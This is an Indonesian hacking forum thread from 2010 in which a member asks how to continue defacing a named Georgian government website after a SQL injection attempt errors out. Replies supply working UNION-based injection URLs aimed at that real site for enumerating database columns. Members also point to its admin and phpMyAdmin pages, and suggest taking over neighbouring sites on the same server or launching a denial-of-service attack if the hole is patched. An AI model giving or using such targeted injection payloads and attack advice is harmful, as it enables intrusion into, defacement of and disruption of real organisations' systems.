ask : cara terusin deface

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

ask : cara terusin deface

Post by shinichi81 » Wed Apr 21, 2010 10:11 pm

Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()

nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--

tetapi keluar tulisannya :

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21

apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:
............make a wish............

User avatar
Xshadow
Posts: 482
Joined: Thu May 31, 2007 8:01 pm
Location: http://captureflags.com
Contact:

Re: ask : cara terusin deface

Post by Xshadow » Wed Apr 21, 2010 10:36 pm

Code: Select all

http://www.dotr.gov.ge/geo/news.php?id=-99+union+select+1,2,group_concat(column_name),4,5,user(),7,8+from+information_schema.columns+where+table_name=0xhexa--
table_name=0xhexa--

baca tutornya sekali lagi :) yang saya tebelin dan berwarna merah itu apa... tolong dibaca dengan jeli tutorialnya :)
nech buat kamu :)
baca dengan baik ya...

Code: Select all

http://www.forkliftpartsmanual.com/anu.html
buka tuh halaman :)
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare

User avatar
ecko
Posts: 112
Joined: Sat Mar 17, 2007 9:18 pm
Location: CianjuR
Contact:

Re: ask : cara terusin deface

Post by ecko » Thu Apr 22, 2010 12:27 am

shinichi81 wrote:Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()

nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--

tetapi keluar tulisannya :

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21

apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:
itu web kyanya udh di patch deh....kaga bisa login ke adminnya :
http://www.dotr.gov.ge/admin/

:mati: :mati: :mati:

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: ask : cara terusin deface

Post by 3xtr3m3b0y » Thu Apr 22, 2010 7:54 am

ecko wrote: itu web kyanya udh di patch deh....kaga bisa login ke adminnya :
http://www.dotr.gov.ge/admin/

:mati: :mati: :mati:
Bukan dipatch, halaman Admin gak bisa konek ke Database Server.
Ada halaman menarik neh http://www.dotr.gov.ge/phpmyadmin/
...n0 l1m17...

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: ask : cara terusin deface

Post by shinichi81 » Thu Apr 22, 2010 7:55 am

kalau udah di patch,bagaimana cara inject-nya lagi yah?? sepertinya beda caranya yah?? bisa diberi tutor bos,kalau mo inject web yang udah di patch :kaca: :kaca:
............make a wish............

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: ask : cara terusin deface

Post by 3xtr3m3b0y » Thu Apr 22, 2010 8:30 am

shinichi81 wrote:Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()

nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--

tetapi keluar tulisannya :

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21

apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:
Pada bagian table_name gak perlu pke bilangan HEXA, cukup pke STRING aja, karena directive magic_quotes_gpc = off, sehingga kita bisa menggunakan STRING.

Untuk mengeceknya :

Code: Select all

http://www.dotr.gov.ge/eng/news.php?id=-99+union+select+1,2,3,4,5,'test pke string',7,8--
Jika kemudian gak error 'n muncul teks test pke string, maka kita bisa menggunakan string.

Jadi alamat URL sebelumnya akan seperti ini :

Code: Select all

http://www.dotr.gov.ge/eng/news.php?id=-99+union+select+1,2,3,4,5,group_concat(column_name),7,8+from+information_schema.columns+where+table_name='user'--
...n0 l1m17...

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: ask : cara terusin deface

Post by 3xtr3m3b0y » Thu Apr 22, 2010 8:41 am

shinichi81 wrote:kalau udah di patch,bagaimana cara inject-nya lagi yah?? sepertinya beda caranya yah?? bisa diberi tutor bos,kalau mo inject web yang udah di patch :kaca: :kaca:
Jika halaman/file yg vuln sdh dipatch, kita bisa mencoba mencari halaman lain yg mungkin belum dipatch, atau dengan mencari jenis vuln lain yg mgkn ada pada web tsb. Klo ternyata sdh dipatch semuax, kita coba dgn teknik JUMPING ATTACK, kita ambil alih web lain yg satu server dgn web tsb, lalu coba masuk ke lokasi web target sebelumnya. Jika ternyata gak bisa juga 'n kita ttp kekeh buat matiin tuh web, bisa coba pke teknik DoS.

Mgkn teman yg lain bisa nambahin teknik ilmiah apalagi yg bisa kita gunakan...
...n0 l1m17...

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: ask : cara terusin deface

Post by shinichi81 » Thu Apr 22, 2010 9:12 am

makasih suhu2,jadi bertambah nih ilmunya :love: :love: :love: eh bos,kalau teknik JUMPING teh apaan yah :malumalu: :malumalu: :malumalu:
............make a wish............

User avatar
Xshadow
Posts: 482
Joined: Thu May 31, 2007 8:01 pm
Location: http://captureflags.com
Contact:

Re: ask : cara terusin deface

Post by Xshadow » Thu Apr 22, 2010 10:50 am

pelajari 1-1... kalo dah kelar baru bahas yang lain...
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare

User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: ask : cara terusin deface

Post by shinichi81 » Thu Apr 22, 2010 11:00 am

Xshadow wrote:pelajari 1-1... kalo dah kelar baru bahas yang lain...

Siap Bos Xshadow,nanti saya coba oprek lagi hehehe....Bos,kalau 1-1 teh apaan? atau maksudnya dari tahap pertama dilang lagi yah cari yang belum di patch :pusing: :pusing: :pusing:
............make a wish............

Post Reply

Return to “Web Hacking”